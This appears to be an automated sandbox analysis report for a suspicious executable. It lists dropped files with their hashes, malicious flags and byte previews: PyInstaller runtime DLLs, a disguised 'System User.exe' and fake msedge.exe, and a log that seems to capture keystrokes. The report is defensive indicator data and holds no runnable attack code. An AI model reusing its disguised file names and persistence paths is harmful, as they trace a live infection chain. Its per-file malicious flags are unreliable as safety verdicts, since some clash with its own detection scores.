                                                                                                                                                                                                    File Type:Mini DuMP crash report, 16 streams, Fri Dec 20 18:03:29 2024, 0x1205a4 type
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):616622
                                                                                                                                                                                                    Entropy (8bit):3.2795922451199595
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3072:/bGmA3+vprpoVmfyBOXpIymdSZIJR70S9VU4aPMR+37ktkvau7LWTVdcSr5Y4viw:TGmA3QI79Up++4i1LWr1Y4QqvXA6bB
                                                                                                                                                                                                    MD5:27E1A100399119486D0998B0EE284F86
                                                                                                                                                                                                    SHA1:DA90E68266055C6D6FA5CFC67D3B4A131ADF0B6A
                                                                                                                                                                                                    SHA-256:A3C3690EFA375536A99D55CBD795AC4CFA31F8B513C6DBD8AFB6273FEC9F9A89
                                                                                                                                                                                                    SHA-512:5D2836758BDDDC95F9AD052236C93A4EA23E01A2F3D088B8923E049623538515C234BCBAC276254AEFBB93EA244B2002A4C636B38D966E0640C31E206EE59AA3
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:MDMP..a..... .......q.eg............d...........<...........<....)...........)......tT..............l.......8...........T............W...............F...........G..............................................................................eJ.......H......Lw......................T.......L...b.eg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER3B0A.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):6768
                                                                                                                                                                                                    Entropy (8bit):3.7164055635204187
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:R6l7wVeJK8ZpgP5cYZ58UcprM089bO5UfAam:R6lXJxZpgBcYHlvxOqfM
                                                                                                                                                                                                    MD5:2F57F10661DC5271D0F324CD82546485
                                                                                                                                                                                                    SHA1:0CD51E8CC0FA79924CD94965D071283667DAD258
                                                                                                                                                                                                    SHA-256:FC6A41F698876782E3D91B38D372EE1A572AAB04655BEAA141E976427F21C6C6
                                                                                                                                                                                                    SHA-512:6C383397A31E1E03B4DF941F07147FCC1EBDC8983F51D3DCD22994A4CAAAE4B81D3E4724909B690B50AE6C5F74301641B561B6DACD8CBCFB2F0E9196A1E48187
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.4.7.6.<./.P.i.

                                                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER3B3A.tmp.xml

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):4769
                                                                                                                                                                                                    Entropy (8bit):4.436060729624475
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:48:cvIwWl8zs1Jg771I93tSWpW8VYLYm8M4JoD/FGWyq8vq3DIWad:uIjfPI7gV7VTJfWWssWad
                                                                                                                                                                                                    MD5:0220813281E5296BC47C75B1EF0C9D0B
                                                                                                                                                                                                    SHA1:7F7E177B2BAF371523B34DB66118795C1421B438
                                                                                                                                                                                                    SHA-256:1BA3F8D0C8272B5D1A4D382C14911D4785BEB74C3B63C9719244584B9B40E233
                                                                                                                                                                                                    SHA-512:FFC47A01576F82E345E2708A29CE0E028B3C636888E8C8BE95832B63B5586DE87EDE2DA9A4A91BF14253101246F4429272F214D6F950FF31E291F9E320097092
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="639906" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\System User.exe.log

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Users\user\AppData\Roaming\System User.exe
                                                                                                                                                                                                    File Type:CSV text
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):654
                                                                                                                                                                                                    Entropy (8bit):5.380476433908377
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                                                                                                                                                                    MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                                                                                                                                                                    SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                                                                                                                                                                    SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                                                                                                                                                                    SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:modified
                                                                                                                                                                                                    Size (bytes):64
                                                                                                                                                                                                    Entropy (8bit):0.34726597513537405
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:Nlll:Nll
                                                                                                                                                                                                    MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                                                                    SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                                                                    SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                                                                    SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:@...e...........................................................

                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\Log.tmp

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\msedge.exe
                                                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):41
                                                                                                                                                                                                    Entropy (8bit):3.7195394315431693
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:rRSFYJKXzovNsr4rNrn:EFYJKDoWrcBn
                                                                                                                                                                                                    MD5:0DB526D48DAB0E640663E4DC0EFE82BA
                                                                                                                                                                                                    SHA1:17AC435DAFEA6FF9F4D6F83FA6C54F9800F43724
                                                                                                                                                                                                    SHA-256:934290A76F9E1804069D8ED6515B14101D9D8ABA2EACBF5B260F59941C65340E
                                                                                                                                                                                                    SHA-512:FACD013E1B5B8163214CA8C3A18ADEEC3541153CD69240EEFA76DDD54809186E919C1D635AEA648A8641DE7C3216BEC11C41F04719B60F07EDFDC01FF79027B9
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:....### explorer ###..[WIN]r[WIN]r[WIN]r

                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI4322\VCRUNTIME140.dll

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\YgJ5inWPQO.exe
                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):120400
                                                                                                                                                                                                    Entropy (8bit):6.6017475353076716
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:1536:N9TXF5LLXQLlNycKW+D4SdqJk6aN1ACuyxLiyazYaCVoecbdhgOwAd+zfZ1zu:N9jelDoD9uyxLizzFzecbdPwA87S
                                                                                                                                                                                                    MD5:862F820C3251E4CA6FC0AC00E4092239
                                                                                                                                                                                                    SHA1:EF96D84B253041B090C243594F90938E9A487A9A
                                                                                                                                                                                                    SHA-256:36585912E5EAF83BA9FEA0631534F690CCDC2D7BA91537166FE53E56C221E153
                                                                                                                                                                                                    SHA-512:2F8A0F11BCCC3A8CB99637DEEDA0158240DF0885A230F38BB7F21257C659F05646C6B61E993F87E0877F6BA06B347DDD1FC45D5C44BC4E309EF75ED882B82E4E
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                    Joe Sandbox View:
                                                                                                                                                                                                    • Filename: wp-s2.exe, Detection: malicious, Browse
                                                                                                                                                                                                    • Filename: wp-s2.exe, Detection: malicious, Browse
                                                                                                                                                                                                    • Filename: wp-cent.exe, Detection: malicious, Browse
                                                                                                                                                                                                    • Filename: wp-cent.exe, Detection: malicious, Browse
                                                                                                                                                                                                    • Filename: WTvNL75dCr.exe, Detection: malicious, Browse
                                                                                                                                                                                                    • Filename: WTvNL75dCr.exe, Detection: malicious, Browse
                                                                                                                                                                                                    • Filename: chos.exe, Detection: malicious, Browse
                                                                                                                                                                                                    • Filename: ihost.exe, Detection: malicious, Browse
                                                                                                                                                                                                    • Filename: ahost.exe, Detection: malicious, Browse
                                                                                                                                                                                                    • Filename: PixelFlasher.exe, Detection: malicious, Browse
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\=..\...\...\..S$...\...$...\...\..5\...\...\.....\.....\.....\.....\......\.....\..Rich.\..........PE..d.....x.........." ...).$...d............................................................`A........................................0u..4...d}..........................PP...........^..p............................\..@............@...............................text............................... ..`fothk........0...................... ..`.rdata...C...@...D...(..............@..@.data................l..............@....pdata...............p..............@..@_RDATA...............|..............@..@.rsrc................~..............@..@.reloc..............................@..B................................................................................................................................................................................

                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI4322\_bz2.pyd

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\YgJ5inWPQO.exe
                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):85496
                                                                                                                                                                                                    Entropy (8bit):6.614481743039511
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:1536:XEfz7lgmVLsSIX0qku0Spf72hbktIj865spLFImLV7yUzR9AfIIoT:0fz1IX8FS12itIA66pLFImLV5X
                                                                                                                                                                                                    MD5:C17DCB7FC227601471A641EC90E6237F
                                                                                                                                                                                                    SHA1:C93A8C2430E844F40F1D9C880AA74612409FFBB9
                                                                                                                                                                                                    SHA-256:55894B2B98D01F37B9A8CF4DAF926D0161FF23C2FB31C56F9DBBAC3A61932712
                                                                                                                                                                                                    SHA-512:38851CBD234A51394673A7514110EB43037B4E19D2A6FB79471CC7D01DBCF2695E70DF4BA2727C69F1FED56FC7980E3CA37FDDFF73CC3294A2EA44FACDEB0FA9
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........U...4@..4@..4@..L...4@..A..4@....4@..C..4@..D..4@..E..4@.v.A..4@..A..4@..4A.4@.v.M..4@.v.@..4@.v....4@.v.B..4@.Rich.4@.................PE..d....WOg.........." ...*.....\..............................................P......Og....`.............................................H...(........0....... .. ........3...@..........T...........................`...@...............x............................text...?........................... ..`.rdata...=.......>..................@..@.data...............................@....pdata.. .... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................

                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI4322\_decimal.pyd

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\YgJ5inWPQO.exe
                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):280808
                                                                                                                                                                                                    Entropy (8bit):6.594541687872342
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6144:ZtC0Z5JA0/8cyMn9qWM53pLW1Acr8sJMIsgVFe:DbJAy86a9diFe
                                                                                                                                                                                                    MD5:AD4324E5CC794D626FFCCDA544A5A833
                                                                                                                                                                                                    SHA1:EF925E000383B6CAD9361430FC38264540D434A5
                                                                                                                                                                                                    SHA-256:040F361F63204B55C17A100C260C7DDFADD00866CC055FBD641B83A6747547D5
                                                                                                                                                                                                    SHA-512:0A002B79418242112600B9246DA66A5C04651AECB2E245F0220B2544D7B7DF67A20139F45DDF2D4E7759CE8CC3D6B4BE7F98B0A221C756449EB1B6D7AF602325
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\lUT..;...;...;..u....;...:...;...8...;...?...;...>...;...:...;.j.:...;...:...;...8...;...6...;...;...;.......;...9...;.Rich..;.........................PE..d....WOg.........." ...*.....\...............................................P......\V....`.................................................\........0...........+.......6...@..........T...............................@............... ............................text............................... ..`.rdata..l...........................@..@.data...8'......."..................@....pdata...+.......,..................@..@.rsrc........0......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................

                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI4322\_hashlib.pyd

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\YgJ5inWPQO.exe
                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):65528
                                                                                                                                                                                                    Entropy (8bit):6.228447315858868
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:1536:2LDxflFwY9XDhnuVNv1dImvIqyUzR9yRfIPF:2J92ATMVNv1dImvI5qd
                                                                                                                                                                                                    MD5:422E214CA76421E794B99F99A374B077
                                                                                                                                                                                                    SHA1:58B24448AB889948303CDEFE28A7C697687B7EBC
                                                                                                                                                                                                    SHA-256:78223AEF72777EFC93C739F5308A3FC5DE28B7D10E6975B8947552A62592772B
                                                                                                                                                                                                    SHA-512:03FCCCC5A300CC029BEF06C601915FA38604D955995B127B5B121CB55FB81752A8A1EEC4B1B263BA12C51538080335DABAEF9E2B8259B4BF02AF84A680552FA0
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......N.A..............K.............................................x.........................................'.............Rich............PE..d....WOg.........." ...*.P...~.......=....................................................`.........................................p...P................................3......X....l..T............................k..@............`...............................text....N.......P.................. ..`.rdata...M...`...N...T..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..X...........................@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI4322\_lzma.pyd

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\YgJ5inWPQO.exe
                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):159224
                                                                                                                                                                                                    Entropy (8bit):6.86011233030861
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3072:kn18fe1+/ol6s/7NjQWzjUZ1/oPEznfB9mNo7r0J0q4BcFIm01zwWO:k0s0Ef0gS5YO7ICq4BcYw
                                                                                                                                                                                                    MD5:66A9028EFD1BB12047DAFCE391FD6198
                                                                                                                                                                                                    SHA1:E0B61CE28EA940F1F0D5247D40ABE61AE2B91293
                                                                                                                                                                                                    SHA-256:E44DEA262A24DF69FD9B50B08D09AE6F8B051137CE0834640C977091A6F9FCA8
                                                                                                                                                                                                    SHA-512:3C2A4E2539933CBEB1D0B3C8EF14F0563675FD53B6EF487C7A5371DFE2EE1932255F91DB598A61AAADACD8DC2FE2486A91F586542C52DFC054B22AD843831D1E
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:..C~...~...~...w.?.z...o3..|...o3..}...o3..v...o3..r....3..}....4..|...~........3..D....3.......3S......3......Rich~...........PE..d....WOg.........." ...*.`...........1.......................................p............`.............................................L.......x....P.......0.......:...3...`..4....|..T...........................P{..@............p...............................text...N^.......`.................. ..`.rdata.......p.......d..............@..@.data........ ......................@....pdata.......0......................@..@.rsrc........P......................@..@.reloc..4....`.......8..............@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI4322\_socket.pyd

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\YgJ5inWPQO.exe
                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):84984
                                                                                                                                                                                                    Entropy (8bit):6.333897580970998
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:1536:auV3gvWHQdMq3ORC/OypTNQlyJ+9+nzLYwsSI6tzOCu5ImywwyUzR9EtfI5gn:auVQvcQTSypTNQlyJs+nzLYaI6Qt5ImX
                                                                                                                                                                                                    MD5:ABF998769F3CBA685E90FA06E0EC8326
                                                                                                                                                                                                    SHA1:DAA66047CF22B6BE608127F8824E59B30C9026BF
                                                                                                                                                                                                    SHA-256:62D0493CED6CA33E2FD8141649DD9889C23B2E9AFC5FDF56EDB4F888C88FB823
                                                                                                                                                                                                    SHA-512:08C6B3573C596A15ACCF4936533567415198A0DAAB5B6E9824B820FD1F078233BBC3791FDE6971489E70155F7C33C1242B0B0A3A17FE2EC95B9FADAE555ED483
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........c..\..}\..}\..}UzR}Z..}M..|^..}M..|_..}M..|T..}M..|Q..}..|^..}\..}...}...|U..}..|]..}..|]..}.>}]..}..|]..}Rich\..}........PE..d....WOg.........." ...*.x.......... -.......................................`............`.........................................@...P............@.......0...........3...P..........T...........................@...@............................................text....w.......x.................. ..`.rdata.. y.......z...|..............@..@.data...............................@....pdata.......0......................@..@.rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI4322\base_library.zip

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\YgJ5inWPQO.exe
                                                                                                                                                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1396821
                                                                                                                                                                                                    Entropy (8bit):5.531015514770172
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12288:0W7WpzO6etYzGNcT1pz3YQfiBgDPtLwjFx278SAZQYF93BGfL+DuWFnjVpdxhYVd:l7WpzZSeT1xTYF9f5pdxhYVP05WdZ7
                                                                                                                                                                                                    MD5:18C3F8BF07B4764D340DF1D612D28FAD
                                                                                                                                                                                                    SHA1:FC0E09078527C13597C37DBEA39551F72BBE9AE8
                                                                                                                                                                                                    SHA-256:6E30043DFA5FAF9C31BD8FB71778E8E0701275B620696D29AD274846676B7175
                                                                                                                                                                                                    SHA-512:135B97CD0284424A269C964ED95B06D338814E5E7B2271B065E5EABF56A8AF4A213D863DD2A1E93C1425FADB1B20E6C63FFA6E8984156928BE4A9A2FBBFD5E93
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:PK..........!.+.P............._collections_abc.pyc......................................\.....S.r.S.S.K.J.r.J.r. .S.S.K.r.\.".\.\.....5.......r.\.".S.5.......r.S...r.\.".\.5.......r.C./.S.Q.r.S.r.\.".\.".S.5.......5.......r.\.".\.".\.".5.......5.......5.......r.\.".\.".0.R%..................5.......5.......5.......r.\.".\.".0.R)..................5.......5.......5.......r.\.".\.".0.R-..................5.......5.......5.......r.\.".\."./.5.......5.......r.\.".\.".\."./.5.......5.......5.......r.\.".\.".\.".S.5.......5.......5.......r.\.".\.".\.".S.S.-...5.......5.......5.......r.\.".\.".\.".5.......5.......5.......r.\.".\.".S.5.......5.......r \.".\.".S.5.......5.......r!\.".\.".\"".5.......5.......5.......r#\.".0.R%..................5.......5.......r$\.".0.R)..................5.......5.......r%\.".0.R-..................5.......5.......r&\.".\.RN..................5.......r(S...r)\)".5.......r*C)\.".S...".5.......5.......r+S...r,\,".5.......r,\.".\,5.......r-\,R]..................5.......

                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI4322\libcrypto-3.dll

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\YgJ5inWPQO.exe
                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):5232408
                                                                                                                                                                                                    Entropy (8bit):5.940072183736028
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:98304:/V+Qs2NuR5YV0L8PQ1CPwDvt3uFlDC4SC9c:9rs2NuDYV0L841CPwDvt3uFlDC4SCa
                                                                                                                                                                                                    MD5:123AD0908C76CCBA4789C084F7A6B8D0
                                                                                                                                                                                                    SHA1:86DE58289C8200ED8C1FC51D5F00E38E32C1AAD5
                                                                                                                                                                                                    SHA-256:4E5D5D20D6D31E72AB341C81E97B89E514326C4C861B48638243BDF0918CFA43
                                                                                                                                                                                                    SHA-512:80FAE0533BA9A2F5FA7806E86F0DB8B6AAB32620DDE33B70A3596938B529F3822856DE75BDDB1B06721F8556EC139D784BC0BB9C8DA0D391DF2C20A80D33CB04
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........._~.._~.._~..V.S.M~.....]~.....[~.....W~.....S~.._~...~......T~..J....~..J...7}..J...^~..J.?.^~..J...^~..Rich_~..........................PE..d......f.........." ...(..7..<......v........................................0P.......O...`...........................................H.0.....O.@....@O.|.... L. .....O../...PO.$...`{D.8............................yD.@.............O..............................text.....7.......7................. ..`.rdata........7.......7.............@..@.data...Ao....K..<....K.............@....pdata....... L.......K.............@..@.idata...%....O..&....N.............@..@.00cfg..u....0O.......N.............@..@.rsrc...|....@O.......N.............@..@.reloc..~....PO.......N.............@..B................................................................................................................................................

                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI4322\python313.dll

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\YgJ5inWPQO.exe
                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):6093816
                                                                                                                                                                                                    Entropy (8bit):6.129208926967787
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:98304:IDcLwZ+b7nYp4zwSL3TvGnYSBvxHDMiEZ10i:IDgt7nYpvu3TvJik0i
                                                                                                                                                                                                    MD5:3AAD23292404A7038EB07CE5A6348256
                                                                                                                                                                                                    SHA1:35CAC5479699B28549EBE36C1D064BFB703F0857
                                                                                                                                                                                                    SHA-256:78B1DD211C0E66A0603DF48DA2C9B67A915AB3258701B9285D3FAA255ED8DC25
                                                                                                                                                                                                    SHA-512:F5B6EF04E744D2C98C1EF9402D7A8CE5CDA3B008837CF2C37A8B6D0CD1B188CA46585A40B2DB7ACF019F67E6CED59EFF5BC86E1AAF48D3C3B62FECF37F3AEC6B
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........F.r.'.!.'.!.'.!.. .'.!.z!.'.!.. .'.!.. .'.!.. .'.!._.!.'.!... .'.!.'.!N&.!F.. -'.!F.. .'.!F.x!.'.!F.. .'.!Rich.'.!........PE..d....WOg.........." ...*.L+..f9.....`W........................................d.......]...`...........................................P.......P...... d......P].......\..3...0d.D....Q3.T.....................I.(....P3.@............`+..............................text....K+......L+................. ..`.rdata....%..`+...%..P+.............@..@.data...$:....Q..N....P.............@....pdata.......P]......@U.............@..@PyRuntim.N...._..P....W.............@....rsrc........ d.......\.............@..@.reloc..D....0d.......\.............@..B........................................................................................................................................................................................................

                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI4322\select.pyd

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\YgJ5inWPQO.exe
                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):32248
                                                                                                                                                                                                    Entropy (8bit):6.547651395731859
                                                                                                                                                                                                    Encrypted:false
